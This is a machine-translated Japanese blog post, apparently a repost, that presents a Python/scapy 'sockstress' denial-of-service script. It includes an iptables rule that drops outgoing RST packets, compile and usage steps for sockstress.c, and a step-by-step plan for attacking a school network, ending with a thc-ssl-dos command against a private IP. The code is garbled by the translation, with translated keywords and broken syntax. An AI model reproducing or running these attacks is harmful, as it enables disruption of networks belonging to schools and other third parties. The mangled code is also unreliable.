DoS攻撃や浸透学校ネットワーク

私はまだ生きていることを証明するためには、あまり話をしませんでした

ドスは(sockstreesドススクリプトです)スクリプトを攻撃します

1  - * -コーディング:UTF-8 - * - 
2  から scapy.allのインポート *
 3  から時刻インポート睡眠
 4  インポート5  インポート・ロギング
 6  インポートOS
 7  インポート信号
 8つの インポートSYS
 9  
10  から scapy.layers.inet インポートIP 、TCP
 11  
12 logging.getLogger(" scapy.runtime " ).setLevel(logging.ERROR)
 13  
14  もし!LEN(sys.argvの)= 4 15      プリント" 使用方法:./sock_stress.py [IPターゲット] [ポート] [スレッド] " 16      プリント例:./scok_stress.py [1.1.1.1] 20攻撃に開放されている##ポート。17      sys.exit()
 18である 
。19ターゲット= STR(sys.argvのを[1 ])
 20 DstPortのA = INT(sys.argvの[2 ])
 21である [スレッド= INT(sys.argvの3 ])
 22は 
23である #1 #攻撃は機能
24  DEFのsock_stress(ターゲット、DstPortののA):
 25      ながら 0 == 0:
 26である         試み27              X = random.randint(0から65535 28              応答= SR1(IP(DST =目標)/ TCP(スポーツ= X = DPORT DstPortのA、フラグ= ' S ')、タイムアウト= 1、verboss = 0)
 29              送信(IP(DST =目標)/ TCP(DPORT = DstPortのA、X =スポーツ、ウィンドウ= 0、フラグ= ' A '、ACK =(応答[TCP] + .SEQ。1))/ ' \ xOO \ xOO '、verboss = 0)
 30          除く31である             パス
32  #攻撃機能停止
33である DEF シャットダウン(信号フレーム):
 34は、     プリント" 復元ipablesルール"35      os.system(' iptablesのは、フラグ--tcp -p-TCP OUTPUT RST -d -D ' +標的+ ' DROP -jを' 36      sys.exit()
 37  
38である #1 #はiptablesのルールを追加
39  
40 os.systemを(' iptablesの-Aフラグ--tcp -p-TCP OUTPUT RST RST -d ' +対象+ ' DROP -j ' 41れ signal.signal(signal.SIGINT、シャットダウン)が
 42である 
43は、 #1 #マルチスレッド攻撃
44が 印刷" \ nは進行中の攻撃... Ctrlキーを押しながらC攻撃を停止する。」45  X における範囲(0、スレッド):
 46      thread.start_new_thread(sock_stress、(ターゲット、DstPortの))
 47  
48  #永远执行
49  ながら 0 == 0:
 50      睡眠(1)
コードの表示

 

,. / Sockstrees(使用収率を参照してください)

二、。/ sockstress.py [IP]、[ポート] 200

三、iptablesの-A TCP --tcp-フラグ-p OUTPUTはRST RST -d 1.1.1.1 -j DROP(IP手動で追加)

四、iptablesの-L(追加IPを参照してください)

-------------------------------------------------- ----------------------------------------------

グレート神にsockstress.cを活用

まず、インストール:gccの-Wall -c sockstress.c

   コンパイル:gccの-pthread -o sockstress sockstress.o

第二に、説明書:./ sockstress [IP]:[ポート]はeth0 10

(特に有用)

-------------------------------------------------- ----------------------------------------------

学校のネットワークの浸透について

A、学校のドメインを掘ります

二つ、nmapの-v [IP](一つ一つを分析し、すべての既知のIP調製)

第三に、ポートを開こう

第四に、攻撃しよう

(私はコマンドを攻撃しよう:THC-SSL-DOS 172.18.36.254 80 --accpetこれは、TCPハンドシェイクのリソースへの攻撃であるが、残念ながら私の最初の攻撃は失敗しました...)

 

ウェブサイトhttp://www.tonyplot.xyz

 

おすすめ

転載: www.cnblogs.com/money131/p/11122326.html